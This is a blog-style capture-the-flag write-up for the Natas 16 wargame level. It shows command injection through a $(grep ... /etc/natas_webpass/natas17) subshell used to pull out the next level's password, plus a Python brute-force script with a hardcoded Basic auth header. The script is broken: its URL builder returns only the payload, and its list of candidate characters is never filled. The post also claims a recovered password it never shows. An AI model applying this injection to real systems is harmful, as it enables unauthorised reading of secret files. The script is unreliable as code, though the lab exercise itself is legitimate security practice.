Saturday, November 8, 2014

Natas 16

It looks like Natas 16 is similar to some of the earlier challenges that will grep through a dictionary.txt file for us--

While there's no SQL injection here, it does look like it's vulnerable to regular command injection.

I wrote a short python script to automate the process here. We'd like to grep through /etc/natas_webpass/natas17 instead of the dictionary.txt file, but it looks like the characters we've used in the past have now been disallowed.

import requests

auth_header = {'Authorization':'Basic bmF0YXMxNjpXYUlIRWFjajYzd25OSUJST0hlcWkzcDl0MG01bmhtaA=='}
alphanumerics = map(chr, range(65, 91) + range(97,123) + range(48, 58))

def make_url(string):
    return "$(grep -n " + string + " /etc/natas_webpass/natas17)"

def is_correct(string):
    print make_url(string)
    resp = requests.get(make_url(string), headers=auth_header).text
    return "hello" not in resp

# make a list of all possible characters
print "making a list of all characters in pw file..."
possible_chars = []
for char in alphanumerics:
    if is_correct(char):
        print char

# print out all possible characters
print possible_chars

# try to find the full password by appending possible characters to either end of the password we have so far
password = ""
while len(password) < 32:
    print "Password =", password
    for char in possible_chars:
        if is_correct(password + char): password = password + char
        if is_correct(char + password): password = char + password

print password
print "Woohoo!"

We can still use the characters we need to create a subshell, though -- $(xxx) -- so what if we grep for a word we know is in dictionary.txt like "hello" and add the output of the subshell command to the end of it? We know grepping for hello will return true, but grepping for hello1, hello2, hello3, etc. will all return false.

Trying hello$(grep -n _____ /etc/natas_webpass/natas17) as $key gives us the final command grep -i "hello$(grep -n _____ /etc/natas_webpass/natas17)" dictionary.txt.
This seems like it'll work great. We put different characters in place of the ____ and we can now test whether substrings are present within the password file.

The script eventually finishes and returns the password:

No comments:

Post a Comment